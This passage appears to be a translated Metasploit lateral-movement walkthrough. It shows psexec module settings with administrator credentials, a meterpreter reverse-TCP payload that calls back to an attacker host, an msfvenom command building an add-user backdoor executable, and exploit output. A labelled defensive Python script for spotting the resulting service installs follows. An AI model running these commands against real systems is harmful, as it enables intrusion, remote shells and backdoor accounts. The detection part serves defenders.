msf exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOST                 192.168.1.119    yes       The target address
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SHARE                 ADMIN$           yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               123456           no        The password for the specified username
   SMBUser               administrator    no        The username to authenticate as

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.5      yes       The listen address (an interface may be specified)
   LPORT     53               yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic
One less commonly used option needs to be set:
msf exploit(windows/smb/psexec) > set EXE::CUSTOM /var/www/html/bin_tcp_x86_53.exe
EXE::CUSTOM => /var/www/html/bin_tcp_x86_53.exe

root@John:/tmp# msfvenom -p windows/adduser PASS=Micropoor$123 USER=Micropoor -f exe >adduser.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 279 bytes
Final size of exe file: 73802 bytes
This can likewise be combined with a change of target to deal with the control manager's mandatory command acceptance.

Attacker machine settings:
msf exploit(windows/smb/psexec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   PowerShell
   2   Native upload
   3   MOF upload

msf exploit(windows/smb/psexec) > set target 2
target => 2
msf exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.5:53
[*] 192.168.1.119:445 - Connecting to the server...
[*] 192.168.1.119:445 - Authenticating to 192.168.1.119:445 as user 'administrator'...
[*] 192.168.1.119:445 - Uploading payload... kKwZpPRs.exe
[*] 192.168.1.119:445 - Using custom payload /var/www/html/bin_tcp_x86_53.exe, RHOST and RPORT settings will be ignored!
[*] 192.168.1.119:445 - Created kKwZpPRs.exe...
[-] 192.168.1.119:445 - Unable to remove the service, ERROR_CODE:
[-] 192.168.1.119:445 - Exploit failed: RubySMB::Error::UnexpectedStatusCode STATUS_PIPE_EMPTY
[*] Exploit completed, but no session was created.
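As an added defender-side example (not part of the original write-up or of Metasploit), the output above shows what the Native upload target leaves on the host: a service whose binary is written through the ADMIN$ share under a random 8-letter name (kKwZpPRs.exe), and a service that the module could not remove. The script below scans constructed Windows System log records (Event ID 7045, "A service was installed in the system") and flags installs whose image path is a random-looking 8-letter .exe sitting directly under the Windows directory; the dict layout of the records and the name heuristic are assumptions.

```python
import re
from typing import Dict, Iterable, List

# Constructed sample records (not real logs). Field names follow the
# System log event 7045 layout; the dict format itself is an assumption.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "7045", "ServiceName": "kKwZpPRs",
     "ImagePath": r"%SystemRoot%\kKwZpPRs.exe", "AccountName": "LocalSystem"},
    {"EventID": "7045", "ServiceName": "Spooler",
     "ImagePath": r"%SystemRoot%\System32\spoolsv.exe", "AccountName": "LocalSystem"},
    {"EventID": "7045", "ServiceName": "AbCdEfGh",
     "ImagePath": r"\\127.0.0.1\ADMIN$\AbCdEfGh.exe", "AccountName": "LocalSystem"},
    {"EventID": "7036", "ServiceName": "kKwZpPRs",  # state change, not an install
     "ImagePath": r"%SystemRoot%\kKwZpPRs.exe", "AccountName": "LocalSystem"},
]

# Binary placed directly in the Windows directory, written either as
# %SystemRoot%\name.exe or through the ADMIN$ share (\\host\ADMIN$\name.exe).
IMAGE_IN_WINDIR = re.compile(
    r'^"?(?:%systemroot%|\\\\[^\\]+\\admin\$)\\(?P<stem>[^\\"]+)\.exe"?$',
    re.IGNORECASE)
# Eight letters of mixed case, like the kKwZpPRs.exe seen in the output above
# (heuristic assumption; an all-uppercase name such as PSEXESVC does not match).
RANDOM_NAME = re.compile(r"^(?=.*[a-z])(?=.*[A-Z])[A-Za-z]{8}$")


def is_suspicious_service_install(event: Dict[str, str]) -> bool:
    """True for a 7045 event whose service binary is a random-looking
    8-letter .exe sitting directly under the Windows directory."""
    if event.get("EventID") != "7045":
        return False
    m = IMAGE_IN_WINDIR.match(event.get("ImagePath", "").strip())
    if not m:
        return False
    stem = m.group("stem")
    svc = event.get("ServiceName", "")
    # The service is usually registered under the same random name as its binary.
    return bool(RANDOM_NAME.match(stem)) and (svc == stem or bool(RANDOM_NAME.match(svc)))


def suspicious_service_names(events: Iterable[Dict[str, str]]) -> List[str]:
    """Names of services flagged by the heuristic, in log order."""
    return [e["ServiceName"] for e in events if is_suspicious_service_install(e)]


if __name__ == "__main__":
    for name in suspicious_service_names(SAMPLE_EVENTS):
        print(f"suspicious service install: {name}")
```

Because the module reported "Unable to remove the service", a flagged name can also be cross-checked against the services still registered on the host.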